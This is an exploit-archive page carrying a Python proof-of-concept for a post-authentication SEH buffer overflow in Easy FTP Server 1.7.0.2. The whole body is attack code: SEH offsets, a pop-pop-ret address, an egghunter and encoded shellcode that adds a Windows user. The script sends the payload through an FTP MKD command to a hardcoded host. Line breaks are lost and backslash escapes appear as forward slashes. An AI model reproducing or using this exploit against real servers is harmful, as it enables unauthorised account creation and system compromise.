[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Easy Ftp Server v1.7.0.2 Post-Authentication BoF
# Published : 2011-06-01
# Author : b33f
# Previous Title : 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
# Next Title : MODACOM URoad-5000 v1450 Remote Command Execution/Backdoor


			
#!/usr/bin/python# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF# Original Author: dookie2000ca || Windows XP SP3 Professional# Author: b33f - Ruben Boonen# Windows XP Home SP1# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zipimport socketimport sys#-------------------------------------------------------------------------------#SE Handler is overwritten - offset to SEH 256#short jump /xEB/x07#pop pop ret rpcrt4.dll 78011926#badchars 0x00 0x0a 0x2f 0x5c#-------------------------------------------------------------------------------bunny = ("/x66/x81/xCA/xFF/x0F/x42/x52/x6A/x02/x58/xCD/x2E/x3C/x05/x5A/x74/xEF/xB8""/x77/x30/x30/x74" # egghunter marker w00t"/x8B/xFA/xAF/x75/xEA/xAF/x75/xE7/xFF/xE7")#win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNaishellcode = ("/xdb/xd3/x31/xc9/xb8/x5d/x82/xf8/x52/xb1/x34/xd9/x74/x24/xf4/x5f""/x83/xc7/x04/x31/x47/x13/x03/x1a/x91/x1a/xa7/x58/x7d/x9e/x48/xa0""/x7e/x94/x0c/x9c/xf5/xd6/x8b/xa4/x08/xc8/x1f/x1b/x13/x9d/x7f/x83""/x22/x4a/x36/x48/x10/x07/xc8/xa0/x68/xd7/x52/x90/x0f/x17/x10/xef""/xce/x52/xd4/xee/x12/x89/x13/xcb/xc6/x6a/xd8/x5e/x02/xf9/xbf/x84""/xcd/x15/x59/x4f/xc1/xa2/x2d/x10/xc6/x35/xd9/x25/xea/xbe/x1c/xd2""/x9a/x9d/x3a/x20/x5e/x2c/x83/x4c/xeb/x0f/x33/x09/x2b/xf7/x3f/x9a""/xec/x04/xcb/xec/xf0/xb9/x40/x64/x01/x29/x5f/xff/x91/x1d/x60/xff""/x91/xd6/x09/xc3/xce/xd9/x3f/x5b/xa7/x90/x38/x18/x87/xd8/xe8/x76""/xf8/x95/x0d/xd9/x90/x31/xf3/x6f/x6e/x15/xf3/x88/x0c/xf4/x6f/x78""/xb6/x7e/x15/xa4/x17/x1c/xf5/xca/x02/x96/xd5/x67/xbe/x33/x64/xa7""/x26/xc9/xeb/xcc/x86/x44/xcc/x3d/x86/xe2/x48/x61/x2e/xcd/x70/x0f""/x4b/x65/x51/xa3/xfc/xe6/xf0/x57/x64/x9b/x9d/xd2/x1a/x7b/x23/x78""/xb6/x12/xcd/xe9/x3b/x91/x63/x88/xcf/x36/xf6/x39/x10/xaf/x83/xde""/x3b/x0f/x43/x61/xf8/x0b/x9b")payload = "A"*7 + "w00tw00t" + shellcode + "A"*10 + "/xEB/x07/x90/x90" + "/x26/x19/x01/x78" + "/x90"*25 + bunny + "A"*133s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)connect=s.connect(('192.168.1.70',21))s.recv(1024)s.send('USER b33f/r/n')s.recv(1024)s.send('PASS b33f/r/n')s.recv(1024)s.send('MKD ' + payload + '/r/n')s.recv(1024)s.send('QUIT/r/n')s.close